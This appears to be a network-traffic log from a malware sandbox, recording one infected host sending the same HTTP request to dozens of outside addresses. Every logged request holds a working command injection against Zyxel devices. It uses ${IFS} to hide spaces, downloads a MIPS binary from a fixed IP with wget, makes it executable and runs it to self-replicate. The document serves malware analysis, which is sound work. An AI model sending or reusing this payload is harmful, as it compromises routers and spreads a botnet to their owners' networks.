                                                        Jan 28, 2024 10:12:44.239628077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2227192.168.2.145802027.146.145.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239670992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2228192.168.2.1439202199.135.32.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239717960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2229192.168.2.143778081.212.26.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239765882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2230192.168.2.1442150107.85.20.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239813089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2231192.168.2.145339227.107.54.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239836931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2232192.168.2.1437388219.183.40.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239893913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2233192.168.2.143546667.166.9.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239919901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2234192.168.2.1453820139.115.107.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.239983082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2235192.168.2.1448870195.71.170.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240015984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2236192.168.2.1438326219.246.251.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240055084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2237192.168.2.1435512150.228.8.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240114927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2238192.168.2.1446338203.18.94.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240139961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2239192.168.2.143493876.153.200.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240199089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2240192.168.2.143797638.57.4.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240238905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2241192.168.2.1457750110.133.11.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240261078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2242192.168.2.1443740106.224.251.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240303993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2243192.168.2.145700674.93.63.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240322113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2244192.168.2.1451444150.118.83.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240355968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2245192.168.2.1451596155.107.127.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240385056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2246192.168.2.1440630121.39.13.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240448952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2247192.168.2.1451264200.186.2.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240488052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2248192.168.2.146051053.224.160.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240531921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2249192.168.2.145093231.90.34.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240540981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2250192.168.2.144752413.90.58.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240601063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2251192.168.2.1453750174.215.205.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240631104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2252192.168.2.145374623.195.27.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240667105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2253192.168.2.143898648.239.252.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240717888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2254192.168.2.1455068125.124.209.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240742922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2255192.168.2.1459850150.57.201.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240771055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2256192.168.2.1440184154.154.81.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240823984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2257192.168.2.1435514164.240.6.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240870953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2258192.168.2.1453008165.115.47.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240905046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2259192.168.2.1453200153.110.53.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.240951061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2260192.168.2.14552409.164.225.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241024971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2261192.168.2.1453420186.216.27.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241044998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2262192.168.2.144968667.93.193.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241100073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2263192.168.2.145031663.45.176.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241127014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2264192.168.2.1459384116.197.9.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241163015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2265192.168.2.1459506163.204.152.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241182089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2266192.168.2.145634075.179.179.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241231918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2267192.168.2.1457798144.169.57.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241261005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2268192.168.2.145356677.90.161.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241312981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2269192.168.2.14512145.177.140.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241336107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2270192.168.2.145087097.31.197.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241383076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2271192.168.2.1443232138.238.224.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241416931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2272192.168.2.1444528154.127.234.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241457939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2273192.168.2.144282876.132.102.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241480112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2274192.168.2.143542066.210.148.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241528988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2275192.168.2.1437872150.52.74.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241579056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2276192.168.2.144937288.135.250.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241619110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2277192.168.2.1453776140.151.202.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241638899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2278192.168.2.144199473.91.86.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241689920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2279192.168.2.1440674208.2.191.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241714954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2280192.168.2.1451114178.18.239.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241756916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2281192.168.2.143325887.187.194.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241777897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2282192.168.2.1446710172.94.56.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241816998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2283192.168.2.1443558183.180.88.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241843939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2284192.168.2.1457492122.211.192.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241894007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2285192.168.2.144035486.136.140.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241933107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2286192.168.2.14478422.161.157.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.241966963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2287192.168.2.145959687.147.63.178443
                                                        TimestampBytes transferredDirectionData
